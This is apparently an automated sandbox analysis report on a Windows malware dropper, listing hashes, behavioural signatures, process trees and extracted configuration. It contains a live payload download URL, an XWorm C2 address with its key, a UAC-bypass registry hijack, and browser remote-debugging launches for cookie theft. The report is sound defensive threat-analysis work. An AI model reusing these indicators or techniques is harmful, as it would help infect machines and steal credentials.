Resubmissions
28-11-2024 02:19
241128-cr9sks1kht 1027-11-2024 21:08
241127-zyzyaawqgn 1027-11-2024 20:16
241127-y145caymbs 1027-11-2024 20:13
241127-yzlxdavlen 1027-11-2024 19:53
241127-yl61dsxpcs 1027-11-2024 19:38
241127-ycrjcaxkfx 1027-11-2024 19:03
241127-xqsswsslej 1027-11-2024 19:03
241127-xqf44aslcr 327-11-2024 19:02
241127-xpxqfsslan 327-11-2024 18:32
241127-w6pkqs1mek 10Analysis
-
max time kernel
597s -
max time network
601s -
platform
windows11-21h2_x64 -
resource
win11-20241007-uk -
resource tags
arch:x64arch:x86image:win11-20241007-uklocale:uk-uaos:windows11-21h2-x64systemwindows -
submitted
27-11-2024 20:13
Static task
static1
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe
Extracted
xworm
5.0
68.178.207.33:7000
sSM7p4MT4JctLnRS
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x0008000000025afe-5678.dat family_xworm behavioral1/memory/2136-5684-0x0000000000170000-0x000000000017E000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
Winsvc.exedescription pid Process procid_target PID 2560 created 3284 2560 Winsvc.exe 53 -
Xmrig family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
random.exeunik.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unik.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/5896-4120-0x00007FF714330000-0x00007FF714F80000-memory.dmp xmrig behavioral1/memory/5896-5673-0x00007FF714330000-0x00007FF714F80000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 113 6120 powershell.exe 119 6120 powershell.exe -
Processes:
powershell.exepowershell.exepid Process 5324 powershell.exe 6120 powershell.exe -
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
Processes:
chrome.exemsedge.exemsedge.exemsedge.exechrome.exechrome.exechrome.exemsedge.exemsedge.exepid Process 5128 chrome.exe 6528 msedge.exe 6472 msedge.exe 2216 msedge.exe 2836 chrome.exe 1364 chrome.exe 1832 chrome.exe 5412 msedge.exe 6752 msedge.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
random.exeunik.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unik.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unik.exe -
Drops startup file 1 IoCs
Processes:
Winsvc.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs Winsvc.exe -
Executes dropped EXE 27 IoCs
Processes:
Winsvc.exeTPB-1.exegvndxfghs.exegvndxfghs.exegvndxfghs.exegvndxfghs.exerandom.exeunik.exexblkpfZ8Y4.exetest28.exetest26.exetest27.exetest29.exetest25.exetest24.exetik-tok-1.0.5.0-installer_iPXA-F1.exemain_v4.exeTikTok18.exeTikTok18.exepapa_hr_build.exepapa_hr_build.exefHR9z2C.exeAmLzNi.exeXworm%20V5.6.exepapa_hr_build.exeXClient.exepapa_hr_build.exepid Process 2560 Winsvc.exe 4508 TPB-1.exe 4608 gvndxfghs.exe 5252 gvndxfghs.exe 1076 gvndxfghs.exe 5628 gvndxfghs.exe 1372 random.exe 1304 unik.exe 5896 xblkpfZ8Y4.exe 5948 test28.exe 1856 test26.exe 2164 test27.exe 3556 test29.exe 5400 test25.exe 3868 test24.exe 5156 tik-tok-1.0.5.0-installer_iPXA-F1.exe 640 main_v4.exe 6468 TikTok18.exe 6488 TikTok18.exe 6408 papa_hr_build.exe 6892 papa_hr_build.exe 2008 fHR9z2C.exe 5056 AmLzNi.exe 8932 Xworm%20V5.6.exe 9052 papa_hr_build.exe 2136 XClient.exe 8836 papa_hr_build.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
random.exeunik.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Wine unik.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
gvndxfghs.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook gvndxfghs.exe Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook gvndxfghs.exe Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook gvndxfghs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x001c00000002abf7-5587.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
random.exeunik.exepid Process 1372 random.exe 1304 unik.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
gvndxfghs.exeWinsvc.exepapa_hr_build.exepapa_hr_build.exeInstallUtil.exedescription pid Process procid_target PID 4608 set thread context of 5252 4608 gvndxfghs.exe 82 PID 4608 set thread context of 1076 4608 gvndxfghs.exe 83 PID 4608 set thread context of 5628 4608 gvndxfghs.exe 84 PID 2560 set thread context of 1608 2560 Winsvc.exe 109 PID 6408 set thread context of 6892 6408 papa_hr_build.exe 149 PID 9052 set thread context of 8836 9052 papa_hr_build.exe 172 PID 1608 set thread context of 2824 1608 InstallUtil.exe 177 -
Processes:
resource yara_rule behavioral1/files/0x0006000000025ae7-1286.dat upx behavioral1/memory/5896-1290-0x00007FF714330000-0x00007FF714F80000-memory.dmp upx behavioral1/memory/5896-4120-0x00007FF714330000-0x00007FF714F80000-memory.dmp upx behavioral1/memory/5896-5673-0x00007FF714330000-0x00007FF714F80000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
Processes:
chrome.exedescription ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 3340 5252 WerFault.exe 82 5256 5628 WerFault.exe 84 232 6408 WerFault.exe 147 5504 1372 WerFault.exe 90 7320 1304 WerFault.exe 91 2800 9052 WerFault.exe 168 -
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
gvndxfghs.exemain_v4.exetasklist.exepapa_hr_build.exegvndxfghs.exeunik.exepapa_hr_build.exeTPB-1.exerandom.exeTikTok18.exepapa_hr_build.execmd.exepapa_hr_build.exetik-tok-1.0.5.0-installer_iPXA-F1.exeTikTok18.execmd.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language main_v4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language unik.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TPB-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TikTok18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tik-tok-1.0.5.0-installer_iPXA-F1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TikTok18.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
TPB-1.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TPB-1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TPB-1.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exechrome.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\7901.vbs" reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
random.exeunik.exeTPB-1.exechrome.exeWinsvc.exeInstallUtil.exemsedge.exemsedge.exepowershell.exepowershell.exepapa_hr_build.exepid Process 1372 random.exe 1372 random.exe 1304 unik.exe 1304 unik.exe 4508 TPB-1.exe 4508 TPB-1.exe 4508 TPB-1.exe 4508 TPB-1.exe 2836 chrome.exe 2836 chrome.exe 2560 Winsvc.exe 2560 Winsvc.exe 4508 TPB-1.exe 4508 TPB-1.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 4508 TPB-1.exe 4508 TPB-1.exe 6360 msedge.exe 6360 msedge.exe 5412 msedge.exe 5412 msedge.exe 4508 TPB-1.exe 4508 TPB-1.exe 6120 powershell.exe 6120 powershell.exe 6120 powershell.exe 5324 powershell.exe 5324 powershell.exe 5324 powershell.exe 6892 papa_hr_build.exe 6892 papa_hr_build.exe 6892 papa_hr_build.exe 6892 papa_hr_build.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe 1608 InstallUtil.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
chrome.exemsedge.exepid Process 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
Processes:
New Text Document mod.exeWinsvc.exegvndxfghs.exexblkpfZ8Y4.exechrome.exeInstallUtil.exetasklist.exepowershell.exepowershell.exeXworm%20V5.6.exeAddInProcess.exedescription pid Process Token: SeDebugPrivilege 5464 New Text Document mod.exe Token: SeDebugPrivilege 2560 Winsvc.exe Token: SeDebugPrivilege 4608 gvndxfghs.exe Token: SeLockMemoryPrivilege 5896 xblkpfZ8Y4.exe Token: SeLockMemoryPrivilege 5896 xblkpfZ8Y4.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeDebugPrivilege 2560 Winsvc.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeShutdownPrivilege 2836 chrome.exe Token: SeCreatePagefilePrivilege 2836 chrome.exe Token: SeDebugPrivilege 1608 InstallUtil.exe Token: SeDebugPrivilege 6860 tasklist.exe Token: SeDebugPrivilege 6120 powershell.exe Token: SeDebugPrivilege 5324 powershell.exe Token: SeDebugPrivilege 8932 Xworm%20V5.6.exe Token: SeLockMemoryPrivilege 2824 AddInProcess.exe Token: SeLockMemoryPrivilege 2824 AddInProcess.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
Processes:
xblkpfZ8Y4.exechrome.exemsedge.exeAmLzNi.exeAddInProcess.exepid Process 5896 xblkpfZ8Y4.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 2836 chrome.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5412 msedge.exe 5056 AmLzNi.exe 5056 AmLzNi.exe 5056 AmLzNi.exe 5056 AmLzNi.exe 5056 AmLzNi.exe 2824 AddInProcess.exe -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
AmLzNi.exepid Process 5056 AmLzNi.exe 5056 AmLzNi.exe 5056 AmLzNi.exe 5056 AmLzNi.exe 5056 AmLzNi.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
tik-tok-1.0.5.0-installer_iPXA-F1.exepid Process 5156 tik-tok-1.0.5.0-installer_iPXA-F1.exe 5156 tik-tok-1.0.5.0-installer_iPXA-F1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
New Text Document mod.exegvndxfghs.exeTPB-1.exechrome.exedescription pid Process procid_target PID 5464 wrote to memory of 2560 5464 New Text Document mod.exe 79 PID 5464 wrote to memory of 2560 5464 New Text Document mod.exe 79 PID 5464 wrote to memory of 4508 5464 New Text Document mod.exe 80 PID 5464 wrote to memory of 4508 5464 New Text Document mod.exe 80 PID 5464 wrote to memory of 4508 5464 New Text Document mod.exe 80 PID 5464 wrote to memory of 4608 5464 New Text Document mod.exe 81 PID 5464 wrote to memory of 4608 5464 New Text Document mod.exe 81 PID 5464 wrote to memory of 4608 5464 New Text Document mod.exe 81 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 5252 4608 gvndxfghs.exe 82 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 1076 4608 gvndxfghs.exe 83 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 4608 wrote to memory of 5628 4608 gvndxfghs.exe 84 PID 5464 wrote to memory of 1372 5464 New Text Document mod.exe 90 PID 5464 wrote to memory of 1372 5464 New Text Document mod.exe 90 PID 5464 wrote to memory of 1372 5464 New Text Document mod.exe 90 PID 5464 wrote to memory of 1304 5464 New Text Document mod.exe 91 PID 5464 wrote to memory of 1304 5464 New Text Document mod.exe 91 PID 5464 wrote to memory of 1304 5464 New Text Document mod.exe 91 PID 5464 wrote to memory of 5896 5464 New Text Document mod.exe 92 PID 5464 wrote to memory of 5896 5464 New Text Document mod.exe 92 PID 5464 wrote to memory of 5948 5464 New Text Document mod.exe 94 PID 5464 wrote to memory of 5948 5464 New Text Document mod.exe 94 PID 4508 wrote to memory of 2836 4508 TPB-1.exe 95 PID 4508 wrote to memory of 2836 4508 TPB-1.exe 95 PID 2836 wrote to memory of 5636 2836 chrome.exe 96 PID 2836 wrote to memory of 5636 2836 chrome.exe 96 PID 5464 wrote to memory of 1856 5464 New Text Document mod.exe 97 PID 5464 wrote to memory of 1856 5464 New Text Document mod.exe 97 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 PID 2836 wrote to memory of 5844 2836 chrome.exe 98 -
outlook_office_path 1 IoCs
Processes:
gvndxfghs.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook gvndxfghs.exe -
outlook_win_path 1 IoCs
Processes:
gvndxfghs.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook gvndxfghs.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3284
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5464 -
C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe"C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"4⤵PID:2860
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc077fcc40,0x7ffc077fcc4c,0x7ffc077fcc585⤵PID:5636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1820 /prefetch:25⤵PID:5844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2052,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2320 /prefetch:35⤵PID:1448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2084,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2344 /prefetch:85⤵PID:3692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3032,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3052 /prefetch:15⤵
- Uses browser remote debugging
PID:1832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3060,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:15⤵
- Uses browser remote debugging
PID:1364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:15⤵
- Uses browser remote debugging
PID:5128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4132,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4168 /prefetch:85⤵PID:2196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4228,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4172 /prefetch:85⤵PID:4004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,9609026824802032669,7399205643267421493,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:85⤵PID:6192
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
